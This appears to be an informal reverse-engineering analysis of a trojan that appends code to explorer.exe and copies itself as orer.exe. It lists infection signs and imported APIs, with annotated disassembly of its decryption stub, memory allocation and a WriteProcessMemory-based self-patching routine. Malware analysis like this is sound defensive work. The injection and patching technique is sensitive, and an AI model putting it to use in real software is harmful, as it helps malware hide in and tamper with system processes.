                               .:: Orer.exe Reverse Code Engineering #1::.

Orer.exe is the after-infection result of Trojan-xxx. It's name derives from explORER.exe, in other words 
it cuts explorer's name.

The Trojan, attacks indeed explorer executable by appending the malicious code, and finally duplicating itself with the name orer.exe, into Temp directory; so as you can understand is relatively easy to detect, please note that Executable's date/time will correspond to the original explorer.exe.

Usual Signs of Infection:

Desktop's icons disappear for instants
RADmin and other Net-Monitoring tools will be unable to enstablish connections
Frequently, Win will report Memory Access Violations
MS Word is killed after some seconds that is opened
Particular programs, as FileMaker will be destroyed

                                      .:: First Look Analysis ::.

Executable is not packer or crypted, important to mantain the same explorer size, except some easy and little portion of Self Modifing Code, debug informations are not stripped (remember that orer.exe, derives from explorer.exe) so RCE it's truly easy.

At a first look of the Disassembly, executable sets many timers upon certain processes and 


01019634                 call    loc_10460D0 ; Entry Point Lands Here..
01019639                 sub     esp, 44h
0101963C                 push    esi
0101963D                 push    edi
0101963E                 push    10h             ; nInBufferSize
01019640                 push    offset aExplorerstartu ; "ExplorerStartup"
01019645                 call    sub_10146D4
0101964A                 call    sub_1019708
0101964F                 push    1               ; uMode
01019651                 call    ds:SetErrorMode


The code listed above corresponds to the Entry Point of orer, and suddlenly we can see a foundamental difference from explorer's code, the call 010460D0 that contains a RunTime decrypt routine.

+++++++++++++++++++

for Orer2a:
CreateRemoteThread, GetCurrentProcessId,ReadProcessMemory, WriteProcessMemory, CreateThread,
CreateEventA, WaitForSingleObject, FindFirstFileW,FindNextFileW,GetCurrentDirectoryW,SetCurrentDirectory,
OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ws2_32.connect, WSAStartup, socket,
gethostbyname, send, recv, WININET.InternetOpenA, InternetOpenUrlA,InternetReadFile, InternetCloseHandle.

Into the Main Thread:
00840277  ^E0 D6            LOOPDNE SHORT 0084024F
00840279   61               POPAD
0084027A   0BD2             OR EDX,EDX        ;Orer's EntryPoint Address
0084027C   74 1C            JE SHORT 0084029A
0084027E   832C24 05        SUB DWORD PTR SS:[ESP],5
00840282   8B1424           MOV EDX,DWORD PTR SS:[ESP]
00840285   6A 00            PUSH 0
00840287   6A 05            PUSH 5
00840289   6A 00            PUSH 0
0084028B   52               PUSH EDX ;Orer's EP
0084028C   8D83 47114000    LEA EAX,DWORD PTR DS:[EBX+401147]
00840292   50               PUSH EAX     ;00840147
00840293   6A 00            PUSH 0
00840295   E8 340E0000      CALL 008410CE
0084029A   6A 40            PUSH 40
0084029C   68 00100000      PUSH 1000
008402A1   68 951D0000      PUSH 1D95                      
008402A6   6A 00            PUSH 0                         
008402A8   FF93 D9284000    CALL DWORD PTR DS:[EBX+4028D9] ;VirtualAlloc
008402AE   8983 CA144000    MOV DWORD PTR DS:[EBX+4014CA],EAX
008402B4   8D93 4C114000    LEA EDX,DWORD PTR DS:[EBX+40114C];0084014c
008402BA   EB 16            JMP SHORT 008402D2
008402BC   8B32             MOV ESI,DWORD PTR DS:[EDX]
008402BE   8B4A 04          MOV ECX,DWORD PTR DS:[EDX+4]
008402C1   6A 01            PUSH 1
008402C3   51               PUSH ECX
008402C4   6A 00            PUSH 0
008402C6   56               PUSH ESI    ;orer.010460d0
008402C7   50               PUSH EAX    ;BaseAddress Of Allocated Region
008402C8   6A 00            PUSH 0
008402CA   E8 FF0D0000      CALL 008410CE ;This time the pushed bytes are taken from 010460d0
008402D2   833A 00          CMP DWORD PTR DS:[EDX],0 ; 010460d0
008402D5  ^75 E5            JNZ SHORT 008402BC

;Procedure is repeated for 010458e0, Reverse(84 5C 00 01 EC 01 || 00 00 10 6D 04 01), and orer's EP

008402D7   FFB3 CA144000    PUSH DWORD PTR DS:[EBX+4014CA]
008402DD   68 04010000      PUSH 104
008402E2   FFB3 CA144000    PUSH DWORD PTR DS:[EBX+4014CA]
008402E8   6A 00            PUSH 0
008402EA   FF93 B9284000    CALL DWORD PTR DS:[EBX+4028B9] ;GetModuleFileName
Obtain the  full path and filename for the executable file containing the current module.
00810306   8039 45          CMP BYTE PTR DS:[ECX],45
00810309   0F85 B9000000    JNZ 008103C8                 ;Jump to GetWindowsDirectory
0081030F   8079 02 78       CMP BYTE PTR DS:[ECX+2],78
...
008103C8   FFB3 CA144000    PUSH DWORD PTR DS:[EBX+4014CA]
008103CE   68 04010000      PUSH 104
008103D3   FFB3 CA144000    PUSH DWORD PTR DS:[EBX+4014CA]
008103D9   FF93 B5284000    CALL DWORD PTR DS:[EBX+4028B5]           ; kernel32.GetWindowsDirectoryW
...
008103F4   6A 00            PUSH 0
008103F6   50               PUSH EAX
008103F7   57               PUSH EDI
008103F8   57               PUSH EDI
008103F9   50               PUSH EAX
008103FA   57               PUSH EDI
008103FB   57               PUSH EDI
008103FC   68 04010000      PUSH 104
00810401   FF93 BD284000    CALL DWORD PTR DS:[EBX+4028BD]           ; kernel32.GetTempPathW
0081040D   03F8             ADD EDI,EAX
0081040F   03F8             ADD EDI,EAX
...
00810418   FF93 7D284000    CALL DWORD PTR DS:[EBX+40287D]           ; kernel32.GetFileAttributesW

Get File Attributes of orer.exe, if orer exist, come back to the original explorer..


-----------------------------------------------------
Into call 008410ce:
008410CE   55               PUSH EBP                                 ; kernel32.7C800000
008410CF   8BEC             MOV EBP,ESP
...
008410E3   FF75 18          PUSH DWORD PTR SS:[EBP+18] ;0000005
008410E6   FF75 10          PUSH DWORD PTR SS:[EBP+10] ;Orer's EP
008410E9   FF93 DD284000    CALL DWORD PTR DS:[EBX+4028DD] ;VirtualProtect
008110EF   837D 08 00       CMP DWORD PTR SS:[EBP+8],0
008110F3   75 09            JNZ SHORT 008110FE
008110F5   FF93 09294000    CALL DWORD PTR DS:[EBX+402909]           ; kernel32.GetCurrentProcessId
008110FB   8945 08          MOV DWORD PTR SS:[EBP+8],EAX
008110FE   FF75 08          PUSH DWORD PTR SS:[EBP+8]
00811101   6A 00            PUSH 0
00811103   68 FF0F1F00      PUSH 1F0FFF
00811108   FF93 01294000    CALL DWORD PTR DS:[EBX+402901] ;OpenProcess
0081110E   0BC0             OR EAX,EAX
00811110   74 49            JE SHORT 0081115B
00811112   8945 F8          MOV DWORD PTR SS:[EBP-8],EAX
00811115   837D 14 00       CMP DWORD PTR SS:[EBP+14],0
00811119   74 14            JE SHORT 0081112F
0081111B   6A 00            PUSH 0
0081111D   FF75 18          PUSH DWORD PTR SS:[EBP+18] 
00811120   FF75 14          PUSH DWORD PTR SS:[EBP+14] 
00811123   FF75 10          PUSH DWORD PTR SS:[EBP+10] 
00811126   FF75 F8          PUSH DWORD PTR SS:[EBP-8]  
00811129   FF93 0D294000    CALL DWORD PTR DS:[EBX+40290D] 
0081112F   6A 00            PUSH 0
00811131   FF75 18          PUSH DWORD PTR SS:[EBP+18]    ;00000005
00811134   FF75 0C          PUSH DWORD PTR SS:[EBP+C]     ;00840147
00811137   FF75 10          PUSH DWORD PTR SS:[EBP+10]    ;Orer's EP
0081113A   FF75 F8          PUSH DWORD PTR SS:[EBP-8]     ;Handle's Process Object
0081113D   FF93 11294000    CALL DWORD PTR DS:[EBX+402911];WriteProcessMemory
00811143   0BC0             OR EAX,EAX
00811145   75 09            JNZ SHORT 00811150
00811147   8B45 FC          MOV EAX,DWORD PTR SS:[EBP-4]
0081114A   C700 FFFFFFFF    MOV DWORD PTR DS:[EAX],-1
00811150   FF75 F8          PUSH DWORD PTR SS:[EBP-8]
00811153   FF93 A5284000    CALL DWORD PTR DS:[EBX+4028A5] ;CloseHandleA
00811159   EB 09            JMP SHORT 00811164
0081115B   8B45 FC          MOV EAX,DWORD PTR SS:[EBP-4]
0081115E   C700 FFFFFFFF    MOV DWORD PTR DS:[EAX],-1
00811164   61               POPAD
00811165   C9               LEAVE
00811166   C2 1800          RETN 18